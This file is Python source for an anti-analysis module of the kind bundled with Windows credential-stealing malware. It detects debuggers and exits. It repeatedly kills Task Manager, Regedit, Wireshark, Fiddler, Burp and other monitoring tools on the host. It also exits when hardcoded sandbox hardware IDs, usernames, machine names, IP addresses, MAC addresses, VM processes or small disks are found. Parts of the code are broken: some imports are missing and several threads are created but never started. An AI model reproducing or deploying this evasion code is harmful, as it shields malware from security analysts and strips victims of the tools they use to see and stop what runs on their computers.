import os import requests import psutil import platform import subprocess import ctypes import win32api import sys import threading import time kernel32 = ctypes.WinDLL('kernel32') is_debugger_detected = kernel32.IsDebuggerPresent() # first use IsDebuggerPresent API if is_debugger_detected: exit() else: pass # Get the current process handle process_handle = kernel32.GetCurrentProcess() # now, check for debugger using CheckRemoteDebuggerPresent. is_debugger_detected2 = ctypes.c_int(0) kernel32.CheckRemoteDebuggerPresent(process_handle, ctypes.byref(is_debugger_detected2)) if is_debugger_detected2: exit() else: pass class AntiDebug: PROCESSES = ['taskmgr', 'process', 'processhacker', 'ksdumper', 'fiddler', 'httpdebuggerui', 'wireshark', 'httpanalyzerv7', 'fiddler', 'decoder', 'regedit', 'procexp', 'dnspy', 'vboxservice', 'burpsuit'] HWIDS = ["00000000-0000-0000-0000-000000000000", "00000000-0000-0000-0000-50E5493391EF", "00000000-0000-0000-0000-AC1F6BD047A0", "00000000-0000-0000-0000-AC1F6BD04850", "00000000-0000-0000-0000-AC1F6BD048D6", "00000000-0000-0000-0000-AC1F6BD048DC", "00000000-0000-0000-0000-AC1F6BD048F8", "00000000-0000-0000-0000-AC1F6BD048FE", "00000000-0000-0000-0000-AC1F6BD04900", "00000000-0000-0000-0000-AC1F6BD0491C", "00000000-0000-0000-0000-AC1F6BD04926", "00000000-0000-0000-0000-AC1F6BD04928", "00000000-0000-0000-0000-AC1F6BD04972", "00000000-0000-0000-0000-AC1F6BD04976", "00000000-0000-0000-0000-AC1F6BD04978", "00000000-0000-0000-0000-AC1F6BD04986", "00000000-0000-0000-0000-AC1F6BD049B8", "00000000-0000-0000-0000-AC1F6BD04C0A", "00000000-0000-0000-0000-AC1F6BD04D06", "00000000-0000-0000-0000-AC1F6BD04D08", "00000000-0000-0000-0000-AC1F6BD04D8E", "00000000-0000-0000-0000-AC1F6BD04D98", "00000000-0000-0000-0000-AC1F6BD04DC0", "00000000-0000-0000-0000-AC1F6BD04DCC", "02AD9898-FA37-11EB-AC55-1D0C0A67EA8A", "032E02B4-0499-05C3-0806-3C0700080009", "03AA02FC-0414-0507-BC06-D70700080009", "03D40274-0435-05BF-D906-D20700080009", "03DE0294-0480-05DE-1A06-350700080009", "050C3342-FADD-AEDF-EF24-C6454E1A73C9", "05790C00-3B21-11EA-8000-3CECEF4400D0", "0700BEF3-1410-4284-81B1-E5C17FA9E18F", "07AF2042-392C-229F-8491-455123CC85FB", "07E42E42-F43D-3E1C-1C6B-9C7AC120F3B9", "08C1E400-3C56-11EA-8000-3CECEF43FEDE", "0910CBA3-B396-476B-A7D7-716DB90F5FB9", "0934E336-72E4-4E6A-B3E5-383BD8E938C3", "0A36B1E3-1F6B-47DE-8D72-D4F46927F13F", "0A9D60D4-9A32-4317-B7C0-B11B5C677335", "0D748400-3B00-11EA-8000-3CECEF44007E", "0F377508-5106-45F4-A0D6-E8352F51A8A5", "104F9B96-5B46-4567-BF56-0066C1C6F7F0", "11111111-2222-3333-4444-555555555555", "119602E8-92F9-BD4B-8979-DA682276D385", "12204D56-28C0-AB03-51B7-44A8B7525250", "12EE3342-87A2-32DE-A390-4C2DA4D512E9", "138D921D-680F-4145-BDFF-EC463E70C77D", "13A61742-AF45-EFE4-70F4-05EF50767784", "14692042-A78B-9563-D59D-EB7DD2639037", "1AAD2042-66E8-C06A-2F81-A6A4A6A99093", "1B5D3FFD-A28E-4F11-9CD6-FF148989548C", "1D4D3342-D6C4-710C-98A3-9CC6571234D5", "213D2878-0E33-4D8C-B0D1-31425B9DE674", "222EFE91-EAE3-49F1-8E8D-EBAE067F801A", "26645000-3B67-11EA-8000-3CECEF440124", "2AB86800-3C50-11EA-8000-3CECEF440130", "2C5C2E42-E7B1-4D75-3EA3-A325353CDB72", "2CEA2042-9B9B-FAC1-44D8-159FE611FCCC", "2DD1B176-C043-49A4-830F-C623FFB88F3C", "2E6FB594-9D55-4424-8E74-CE25A25E36B0", "2F94221A-9D07-40D9-8C98-87CB5BFC3549", "2FBC3342-6152-674F-08E4-227A81CBD5F5", "34419E14-4019-11EB-9A22-6C4AB634B69A", "361E3342-9FAD-AC1C-F1AD-02E97892270F", "365B4000-3B25-11EA-8000-3CECEF44010C", "38813342-D7D0-DFC8-C56F-7FC9DFE5C972", "38AB3342-66B0-7175-0B23-F390B3728B78", "3A9F3342-D1F2-DF37-68AE-C10F60BFB462", "3EDC0561-C455-4D64-B176-3CFBBBF3FA47", "3F284CA4-8BDF-489B-A273-41B44D668F6D", "3F3C58D1-B4F2-4019-B2A2-2A500E96AF2E", "3FADD8D6-3754-47C4-9BFF-0E35553DD5FB", "40384E87-1FBA-4096-9EA1-D110F0EA92A8", "40F100F9-401C-487D-8D37-48107C6CE1D3", "418F0D5B-FCB6-41F5-BDA5-94C1AFB240ED", "41B73342-8EA1-E6BF-ECB0-4BC8768D86E9", "42A82042-3F13-512F-5E3D-6BF4FFFD8518", "44B94D56-65AB-DC02-86A0-98143A7423BF", "4729AEB0-FC07-11E3-9673-CE39E79C8A00", "481E2042-A1AF-D390-CE06-A8F783B1E76A", "48941AE9-D52F-11DF-BBDA-503734826431", "49434D53-0200-9036-2500-369025000C65", "49434D53-0200-9036-2500-369025003865", "49434D53-0200-9036-2500-369025003A65", "49434D53-0200-9036-2500-369025003AF0", "49434D53-0200-9036-2500-369025005CF0", "49434D53-0200-9036-2500-36902500F022", "49434D53-0200-9065-2500-659025002274", "49434D53-0200-9065-2500-659025005073", "49434D53-0200-9065-2500-659025008074", "49434D53-0200-9065-2500-65902500E439", "499B0800-3C18-11EA-8000-3CECEF43FEA4", "4C4C4544-0050-3710-8058-CAC04F59344A", "4CB82042-BA8F-1748-C941-363C391CA7F3", "4CE94980-D7DA-11DD-A621-08606E889D9B", "4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27", "4DC32042-E601-F329-21C1-03F27564FD6C", "4EDF3342-E7A2-5776-4AE5-57531F471D56", "51646514-93E1-4CB6-AF29-036B45D14CBF", "52A1C000-3BAB-11EA-8000-3CECEF440204", "56B9F600-3C1C-11EA-8000-3CECEF4401DE", "59C68035-4B21-43E8-A6A6-BD734C0EE699", "5BD24D56-789F-8468-7CDC-CAA7222CC121", "5C1CA40D-EF14-4DF8-9597-6C0B6355D0D6", "5CC7016D-76AB-492D-B178-44C12B1B3C73", "5E3E7FE0-2636-4CB7-84F5-8D2650FFEC0E", "5E573342-6093-4F2D-5F78-F51B9822B388", "5EBC5C00-3B70-11EA-8000-3CECEF4401DA", "5EBD2E42-1DB8-78A6-0EC3-031B661D5C57", "60C83342-0A97-928D-7316-5F1080A78E72", "612F079A-D69B-47EA-B7FF-13839CD17404", "63203342-0EB0-AA1A-4DF5-3FB37DBB0670", "63DE70B4-1905-48F2-8CC4-F7C13B578B34", "63FA3342-31C7-4E8E-8089-DAFF6CE5E967", "64176F5E-8F74-412F-B3CF-917EFA5FB9DB", "6608003F-ECE4-494E-B07E-1C4615D1D93C", "66729280-2B0C-4BD0-8131-950D86871E54", "66CC1742-AAC7-E368-C8AE-9EEB22BD9F3B", "671BC5F7-4B0F-FF43-B923-8B1645581DC8", "67442042-0F69-367D-1B2E-1EE846020090", "67C5A563-3218-4718-8251-F38E3F6A89C1", "67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3", "686D4936-87C1-4EBD-BEB7-B3D92ECA4E28", "6881083C-EE5A-43E7-B7E3-A0CE9227839C", "69AEA650-3AE3-455C-9F80-51159BAE5EAE", "6A669639-4BD2-47E5-BE03-9CBAFC9EF9B3", "6AA13342-49AB-DC46-4F28-D7BDDCE6BE32", "6ECEAF72-3548-476C-BD8D-73134A9182C8", "6F3CA5EC-BEC9-4A4D-8274-11168F640058", "71522042-DA0B-6793-668B-CE95AEA7FE21", "72492D47-52EF-427A-B623-D4F2192F97D4", "73163342-B704-86D5-519B-18E1D191335C", "777D84B3-88D1-451C-93E4-D235177420A7", "782ED390-AE10-4727-A866-07018A8DED22", "79AF5279-16CF-4094-9758-F88A616D81B4", "7A484800-3B19-11EA-8000-3CECEF440122", "7AB5C494-39F5-4941-9163-47F54D6D5016", "7CA33342-A88C-7CD1-1ABB-7C0A82F488BF", "7D341C16-E8E9-42EA-8779-93653D877231", "7D6A0A6D-394E-4179-9636-662A8D2C7304", "7E4755A6-7160-4982-8F5D-6AA481749F10", "80152042-2F34-11D1-441F-5FADCA01996D", "83BFD600-3C27-11EA-8000-3CECEF4400B4", "844703CF-AA4E-49F3-9D5C-74B8D1F5DCB6", "84782042-E646-50A0-159F-A8E75D4F9402", "84FE3342-6C67-5FC6-5639-9B3CA3D775A1", "84FEEFBC-805F-4C0E-AD5B-A0042999134D", "8703841B-3C5E-461C-BE72-1747D651CE89", "88DC3342-12E6-7D62-B0AE-C80E578E7B07", "8B4E8278-525C-7343-B825-280AEBCD3BCB", "8DA62042-8B59-B4E3-D232-38B29A10964A", "8EC60B88-7F2B-42DA-B8C3-4E2EF2A8C603", "907A2A79-7116-4CB6-9FA5-E5A58C4587CD", "90A83342-D7E7-7A14-FFB3-2AA345FDBC89", "91625303-5211-4AAC-9842-01A41BA60D5A", "91A9EEDB-4652-4453-AC5B-8E92E68CBCF5", "921E2042-70D3-F9F1-8CBD-B398A21F89C6", "94515D88-D62B-498A-BA7C-3614B5D4307C", "95BF6A00-3C63-11EA-8000-3CECEF43FEB8", "96BB3342-6335-0FA8-BA29-E1BA5D8FEFBE", "9921DE3A-5C1A-DF11-9078-563412000026", "9B2F7E00-6F4C-11EA-8000-3CECEF467028", "9C6D1742-046D-BC94-ED09-C36F70CC9A91", "9FC997CA-5081-4751-BC78-CE56D06F6A62", "A100EFD7-4A31-458F-B7FE-2EF95162B32F", "A15A930C-8251-9645-AF63-E45AD728C20C", "A19323DA-80B2-48C9-9F8F-B21D08C3FE07", "A1A849F7-0D57-4AD3-9073-C79D274EECC8", "A2339E80-BB69-4BF5-84BC-E9BE9D574A65", "A5CE2042-8D25-24C4-71F7-F56309D7D45F", "A6A21742-8023-CED9-EA8D-8F0BC4B35DEA", "A7721742-BE24-8A1C-B859-D7F8251A83D3", "A9C83342-4800-0578-1EE8-BA26D2A678D2", "AAFC2042-4721-4E22-F795-A60296CAC029", "ACA69200-3C4C-11EA-8000-3CECEF4401AA", "ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548", "AF1B2042-4B90-0000-A4E4-632A1C8C7EB1", "B1112042-52E8-E25B-3655-6A4F54155DBF", "B22B623B-6B62-4F9B-A9D3-94A15453CEF4", "B5B77895-D40B-4F30-A565-6EF72586A14A", "B6464A2B-92C7-4B95-A2D0-E5410081B812", "B9DA2042-0D7B-F938-8E8A-DA098462AAEC", "BB233342-2E01-718F-D4A1-E7F69D026428", "BB64E044-87BA-C847-BC0A-C797D1A16A50", "BE784D56-81F5-2C8D-9D4B-5AB56F05D86E", "BFE62042-E4E1-0B20-6076-C5D83EDFAFCE", "C0342042-AF96-18EE-C570-A5EFA8FF8890", "C249957A-AA08-4B21-933F-9271BEC63C85", "C364B4FE-F1C1-4F2D-8424-CB9BD735EF6E", "C51E9A00-3BC3-11EA-8000-3CECEF440034", "C6B32042-4EC3-6FDF-C725-6F63914DA7C7", "C7D23342-A5D4-68A1-59AC-CF40F735B363", "C9283342-8499-721F-12BE-32A556C9A7A8", "CC4AB400-3C66-11EA-8000-3CECEF43FE56", "CC5B3F62-2A04-4D2E-A46C-AA41B7050712", "CD74107E-444E-11EB-BA3A-E3FDD4B29537", "CE352E42-9339-8484-293A-BD50CDC639A5", "CEFC836C-8CB1-45A6-ADD7-209085EE2A57", "CF1BE00F-4AAF-455E-8DCD-B5B09B6BFA8F", "D2DC3342-396C-6737-A8F6-0C6673C1DE08", "D4260370-C9F1-4195-95A8-585611AE73F2", "D4C44C15-4BAE-469B-B8FD-86E5C7EB89AB", "D5DD3342-46B5-298A-2E81-5CA6867168BE", "D7382042-00A0-A6F0-1E51-FD1BBF06CD71", "D7958D98-A51E-4B34-8C51-547A6C2E6615", "D8C30328-1B06-4611-8E3C-E433F4F9794E", "D9142042-8F51-5EFF-D5F8-EE9AE3D1602A", "DBC22E42-59F7-1329-D9F2-E78A2EE5BD0D", "DBCC3514-FA57-477D-9D1F-1CAF4CC92D0F", "DD45F600-3C63-11EA-8000-3CECEF440156", "DD9C3342-FB80-9A31-EB04-5794E5AE2B4C", "DEAEB8CE-A573-9F48-BD40-62ED6C223F20", "E08DE9AA-C704-4261-B32D-57B2A3993518", "E0C806ED-B25A-4744-AD7D-59771187122E", "E1BA2E42-EFB1-CDFD-7A84-8A39F747E0C5", "E2342042-A1F8-3DCF-0182-0E63D607BCC7", "E3BB3342-02A8-5613-9C92-3747616194FD", "E57F6333-A2AC-4F65-B442-20E928C0A625", "E67640B3-2B34-4D7F-BD62-59A1822DDBDC", "E6DBCCDF-5082-4479-B61A-6990D92ACC5F", "E773CC89-EFB8-4DB6-A46E-6CCA20FE4E1A", "EADD1742-4807-00A0-F92E-CCD933E9D8C1", "EB16924B-FB6D-4FA1-8666-17B91F62FB37", "F3EA4E00-3C5F-11EA-8000-3CECEF440016", "F5744000-3C78-11EA-8000-3CECEF43FEFE", "F5BB1742-D36D-A11E-6580-2EA2427B0038", "F5EFEEAC-96A0-11EB-8365-FAFE299935A9", "F68B2042-E3A7-2ADA-ADBC-A6274307A317", "F705420F-0BB3-4688-B75C-6CD1352CABA9", "F91C9458-6656-4E83-B84A-13641DE92949", "F9E41000-3B35-11EA-8000-3CECEF440150", "FA612E42-DC79-4F91-CA17-1538AD635C95", "FA8C2042-205D-13B0-FCB5-C5CC55577A35", "FBC62042-5DE9-16AD-3F27-F818E5F68DD3", "FC40ACF8-DD97-4590-B605-83B595B0C4BA", "FCE23342-91F1-EAFC-BA97-5AAE4509E173", "FE455D1A-BE27-4BA4-96C8-967A6D3A9661", "FED63342-E0D6-C669-D53F-253D696D74DA", "FF577B79-782E-0A4D-8568-B35A9B7EB76B", "9CFF2042-2043-0340-4F9C-4BAE6DC5BB39", "D7AC2042-05F8-0037-54A6-38387D00B767", "52562042-B33F-C9D3-0149-241F40A0F5D8", "3E9AC505-812A-456F-A9E6-C7426582500E", "11E12042-2404-040A-31E4-27374099F748", "6E963342-B9C8-2D14-B057-C60C35722AD4", "9EB0FAF6-0713-4576-BD64-813DEE9E477E", "0B8A2042-2E8E-BECC-B6A4-7925F2163DC9", "89E32042-1B2B-5C76-E966-D4E363846FD4", "699400A5-AFC6-427A-A56F-CE63D3E121CB", "2F230ED7-5797-4DB2-BAA0-99A193503E4B"] USERNAMES = ['WDAGUtilityAccount', 'Abby', 'hmarc', 'patex', 'RDhJ0CNFevzX', 'kEecfMwgj', 'Frank', '8Nl0ColNQ5bq', 'Lisa', 'John', 'george', 'PxmdUOpVyx', '8VizSM', 'w0fjuOVmCcP5A','lmVwjj9b', 'PqONjHVwexsS', '3u2v9m8', 'Julia', 'HEUeRzl', 'fred', 'server', 'BvJChRPnsxn', 'Harry Johnson', 'SqgFOf3G', 'Lucas', 'mike', 'PateX', 'h7dk1xPr', 'Louise','User01', 'test', 'RGzcBUyrznReg'] PCNAMES = ['AMAZING-AVOCADO', 'BEE7370C-8C0C-4', 'DESKTOP-NAKFFMT', 'WIN-5E07COS9ALR', 'B30F0242-1C6A-4', 'DESKTOP-VRSQLAG', 'Q9IATRKPRH', 'XC64ZB', 'DESKTOP-D019GDM', 'DESKTOP-WI8CLET', 'SERVER1','LISA-PC', 'JOHN-PC', 'DESKTOP-B0T93D6', 'DESKTOP-1PYKP29', 'DESKTOP-1Y2433R', 'WILEYPC', 'WORK', '6C4E733F-C2D9-4', 'RALPHS-PC', 'DESKTOP-WG3MYJS', 'DESKTOP-7XC6GEZ','DESKTOP-5OV9S0O', 'QarZhrdBpj', 'ORELEEPC', 'ARCHIBALDPC', 'JULIA-PC', 'd1bnJkfVlH', 'NETTYPC', 'DESKTOP-BUGIO', 'DESKTOP-CBGPFEE', 'SERVER-PC', 'TIQIYLA9TW5M','DESKTOP-KALVINO', 'COMPNAME_4047', 'DESKTOP-19OLLTD', 'DESKTOP-DE369SE', 'EA8C2E2A-D017-4', 'AIDANPC', 'LUCAS-PC', 'MARCI-PC', 'ACEPC', 'MIKE-PC', 'DESKTOP-IAPKN1P','DESKTOP-NTU7VUO', 'LOUISE-PC', 'T00917', 'test42', "05h00Gi0", "3u2v9m8", "43By4", "4tgiizsLimS", "6O4KyHhJXBiR", "7wjlGX7PjlW4", "8Nl0ColNQ5bq", "8VizSM", "Abby", "Amy", "AppOnFlySupport", "ASPNET", "azure", "BUiA1hkm", "BvJChRPnsxn", "cM0uEGN4do", "cMkNdS6", "DefaultAccount", "dOuyo8RV71", "DVrzi", "e60UW", "ecVtZ5wE", "EGG0p", "Frank", "fred", "G2DbYLDgzz8Y", "george", "GjBsjb", "Guest", "h7dk1xPr", "h86LHD", "Harry Johnson", "HEUeRzl", "hmarc", "ICQja5iT", "IVwoKUF", "j6SHA37KA", "j7pNjWM", "John", "jude", "Julia", "kEecfMwgj", "kFu0lQwgX5P", "KUv3bT4", "Lisa", "lK3zMR", "lmVwjj9b", "Louise", "Lucas", "mike", "Mr.None", "noK4zG7ZhOf", "o6jdigq", "o8yTi52T", "OgJb6GqgK0O", "patex", "PateX", "Paul Jones", "pf5vj", "PgfV1X", "PqONjHVwexsS", "pWOuqdTDQ", "PxmdUOpVyx", "QfofoG", "QmIS5df7u", "QORxJKNk", "qZo9A", "RDhJ0CNFevzX", "RGzcBUyrznReg", "S7Wjuf", "server", "SqgFOf3G", "Steve", "test", "TVM", "txWas1m2t", "umyUJ", "Uox1tzaMO", "User01", "w0fjuOVmCcP5A", "WDAGUtilityAccount", "XMiMmcKziitD", "xPLyvzr8sgC", "ykj0egq7fze", "DdQrgc", "ryjIJKIrOMs", "nZAp7UBVaS1", "zOEsT", "l3cnbB8Ar5b8", "xUnUy", "fNBDSlDTXY", "vzY4jmH0Jw02", "gu17B", "UiQcX", "21zLucUnfI85", "OZFUCOD6", "8LnfAai9QdJR", "5sIBK", "rB5BnfuR2", "GexwjQdjXG", "IZZuXj", "ymONofg", "dxd8DJ7c", "JAW4Dz0", "GJAm1NxXVm", "UspG1y1C", "equZE3J", "BXw7q", "lubi53aN14cU", "5Y3y73", "9yjCPsEYIMH", "GGw8NR", "JcOtj17dZx", "05KvAUQKPQ", "64F2tKIqO5", "7DBgdxu", "uHUQIuwoEFU", "gL50ksOp", "Of20XqH4VL", "tHiF2T", "sal.rosenburg"] IPPS = ['88.132.231.71', '78.139.8.50', '20.99.160.173', '88.153.199.169', '84.147.62.12', '194.154.78.160', '92.211.109.160', '195.74.76.222', '188.105.91.116','34.105.183.68', '92.211.55.199', '79.104.209.33', '95.25.204.90', '34.145.89.174', '109.74.154.90', '109.145.173.169', '34.141.146.114', '212.119.227.151','195.239.51.59', '192.40.57.234', '64.124.12.162', '34.142.74.220', '188.105.91.173', '109.74.154.91', '34.105.72.241', '109.74.154.92', '213.33.142.50','109.74.154.91', '93.216.75.209', '192.87.28.103', '88.132.226.203', '195.181.175.105', '88.132.225.100', '92.211.192.144', '34.83.46.130', '188.105.91.143','34.85.243.241', '34.141.245.25', '178.239.165.70', '84.147.54.113', '193.128.114.45', '95.25.81.24', '92.211.52.62', '88.132.227.238', '35.199.6.13', '80.211.0.97','34.85.253.170', '23.128.248.46', '35.229.69.227', '34.138.96.23', '192.211.110.74', '35.237.47.12', '87.166.50.213', '34.253.248.228', '212.119.227.167','193.225.193.201', '34.145.195.58', '34.105.0.27', '195.239.51.3', '35.192.93.107'] MACS = ['00:15:5d:00:07:34', '00:e0:4c:b8:7a:58', '00:0c:29:2c:c1:21', '00:25:90:65:39:e4', 'c8:9f:1d:b6:58:e4', '00:25:90:36:65:0c', '00:15:5d:00:00:f3', '2e:b8:24:4d:f7:de','00:15:5d:13:6d:0c', '00:50:56:a0:dd:00', '00:15:5d:13:66:ca', '56:e8:92:2e:76:0d', 'ac:1f:6b:d0:48:fe', '00:e0:4c:94:1f:20', '00:15:5d:00:05:d5', '00:e0:4c:4b:4a:40','42:01:0a:8a:00:22', '00:1b:21:13:15:20', '00:15:5d:00:06:43', '00:15:5d:1e:01:c8', '00:50:56:b3:38:68', '60:02:92:3d:f1:69', '00:e0:4c:7b:7b:86', '00:e0:4c:46:cf:01','42:85:07:f4:83:d0', '56:b0:6f:ca:0a:e7', '12:1b:9e:3c:a6:2c', '00:15:5d:00:1c:9a', '00:15:5d:00:1a:b9', 'b6:ed:9d:27:f4:fa', '00:15:5d:00:01:81', '4e:79:c0:d9:af:c3','00:15:5d:b6:e0:cc', '00:15:5d:00:02:26', '00:50:56:b3:05:b4', '1c:99:57:1c:ad:e4', '08:00:27:3a:28:73', '00:15:5d:00:00:c3', '00:50:56:a0:45:03', '12:8a:5c:2a:65:d1','00:25:90:36:f0:3b', '00:1b:21:13:21:26', '42:01:0a:8a:00:22', '00:1b:21:13:32:51', 'a6:24:aa:ae:e6:12', '08:00:27:45:13:10', '00:1b:21:13:26:44', '3c:ec:ef:43:fe:de','d4:81:d7:ed:25:54', '00:25:90:36:65:38', '00:03:47:63:8b:de', '00:15:5d:00:05:8d', '00:0c:29:52:52:50', '00:50:56:b3:42:33', '3c:ec:ef:44:01:0c', '06:75:91:59:3e:02','42:01:0a:8a:00:33', 'ea:f6:f1:a2:33:76', 'ac:1f:6b:d0:4d:98', '1e:6c:34:93:68:64', '00:50:56:a0:61:aa', '42:01:0a:96:00:22', '00:50:56:b3:21:29', '00:15:5d:00:00:b3','96:2b:e9:43:96:76', 'b4:a9:5a:b1:c6:fd', 'd4:81:d7:87:05:ab', 'ac:1f:6b:d0:49:86', '52:54:00:8b:a6:08', '00:0c:29:05:d8:6e', '00:23:cd:ff:94:f0', '00:e0:4c:d6:86:77','3c:ec:ef:44:01:aa', '00:15:5d:23:4c:a3', '00:1b:21:13:33:55', '00:15:5d:00:00:a4', '16:ef:22:04:af:76', '00:15:5d:23:4c:ad', '1a:6c:62:60:3b:f4', '00:15:5d:00:00:1d','00:50:56:a0:cd:a8', '00:50:56:b3:fa:23', '52:54:00:a0:41:92', '00:50:56:b3:f6:57', '00:e0:4c:56:42:97', 'ca:4d:4b:ca:18:cc', 'f6:a5:41:31:b2:78', 'd6:03:e4:ab:77:8e','00:50:56:ae:b2:b0', '00:50:56:b3:94:cb', '42:01:0a:8e:00:22', '00:50:56:b3:4c:bf', '00:50:56:b3:09:9e', '00:50:56:b3:38:88', '00:50:56:a0:d0:fa', '00:50:56:b3:91:c8','3e:c1:fd:f1:bf:71', '00:50:56:a0:6d:86', '00:50:56:a0:af:75', '00:50:56:b3:dd:03', 'c2:ee:af:fd:29:21', '00:50:56:b3:ee:e1', '00:50:56:a0:84:88', '00:1b:21:13:32:20','3c:ec:ef:44:00:d0', '00:50:56:ae:e5:d5', '00:50:56:97:f6:c8', '52:54:00:ab:de:59', '00:50:56:b3:9e:9e', '00:50:56:a0:39:18', '32:11:4d:d0:4a:9e', '00:50:56:b3:d0:a7','94:de:80:de:1a:35', '00:50:56:ae:5d:ea', '00:50:56:b3:14:59', 'ea:02:75:3c:90:9f', '00:e0:4c:44:76:54', 'ac:1f:6b:d0:4d:e4', '52:54:00:3b:78:24', '00:50:56:b3:50:de','7e:05:a3:62:9c:4d', '52:54:00:b3:e4:71', '90:48:9a:9d:d5:24', '00:50:56:b3:3b:a6', '92:4c:a8:23:fc:2e', '5a:e2:a6:a4:44:db', '00:50:56:ae:6f:54', '42:01:0a:96:00:33','00:50:56:97:a1:f8', '5e:86:e4:3d:0d:f6', '00:50:56:b3:ea:ee', '3e:53:81:b7:01:13', '00:50:56:97:ec:f2', '00:e0:4c:b3:5a:2a', '12:f8:87:ab:13:ec', '00:50:56:a0:38:06','2e:62:e8:47:14:49', '00:0d:3a:d2:4f:1f', '60:02:92:66:10:79', '', '00:50:56:a0:d7:38', 'be:00:e5:c5:0c:e5', '00:50:56:a0:59:10', '00:50:56:a0:06:8d','00:e0:4c:cb:62:08', '4e:81:81:8e:22:4e'] MIN_DISK_SIZE_GB = 45 def __init__(self): self.autoclose_processes() self.check_hwids() self.check_username() self.check_pcname() self.check_ips() self.check_mac() self.check_disk_size() self.stop = False self.threads = [] t1 = threading.Thread(target=self.antivm) t2 = threading.Thread(target=self.autoclose) t3 = threading.Thread(target=self.autoclose_processes) t4 = threading.Thread(target=self.check_hwids) t5 = threading.Thread(target=self.check_username) t6 = threading.Thread(target=self.check_pcname) t7 = threading.Thread(target=self.check_mac) t8 = threading.Thread(target=self.check_pcname) t9 = threading.Thread(target=self.check_disk_size) self.threads.extend([t1, t2]) for t in self.threads: t.start() def autoclose(self): for _ in range(120): for p in psutil.process_iter(): if any(procstr in p.name().lower() for procstr in ['taskmgr','process','processhacker','ksdumper','fiddler','httpdebuggerui','wireshark','httpanalyzerv7','fiddler','decoder','regedit','procexp','dnspy','vboxservice','burpsuit', 'burpsuite', 'debugger','httpproxy', 'mitm' ]): try: p.kill() except psutil.AccessDenied: pass except psutil.NoSuchProcess: pass except: pass time.sleep(1) def antivm(self): for p in psutil.process_iter(): if any(procstr in p.name().lower() for procstr in ["vmwareservice", "vmwaretray", "virtualmachine", "sandboxie" "windowssandbox","joeboxcontrol","vmwareuser","vmware","virtualbox","hyperv"]): self.stop = True os._exit(0) def autoclose_processes(self): for process in psutil.process_iter(): if any(procstr in process.name().lower() for procstr in self.PROCESSES): try: process.kill() except: pass def check_hwids(self): try: hwid = str(subprocess.check_output('wmic csproduct get uuid')).replace(" ", "").split("\\n")[1].split("\\r")[0] except: hwid = "lol" if hwid in self.HWIDS: os._exit(1) def check_username(self): usrname = os.getenv('UserName') if usrname in self.USERNAMES: os._exit(1) def check_pcname(self): pcname = os.getenv('COMPUTERNAME') if pcname in self.PCNAMES: os._exit(1) def check_ips(self): try: ip = str(requests.get("http://ipinfo.io/json").json()["ip"]) except: ip = 'penis' if ip in self.IPPS: os._exit(1) def check_mac(self): mac = ':'.join(re.findall('..', '%012x' % uuid.getnode())) if mac in self.MACS: os._exit(1) def check_disk_size(self): if len(sys.argv) > 1: self.MIN_DISK_SIZE_GB = float(sys.argv[1]) _, diskSizeBytes, _ = win32api.GetDiskFreeSpaceEx() diskSizeGB = diskSizeBytes / 1073741824 if diskSizeGB < self.MIN_DISK_SIZE_GB: os._exit(1)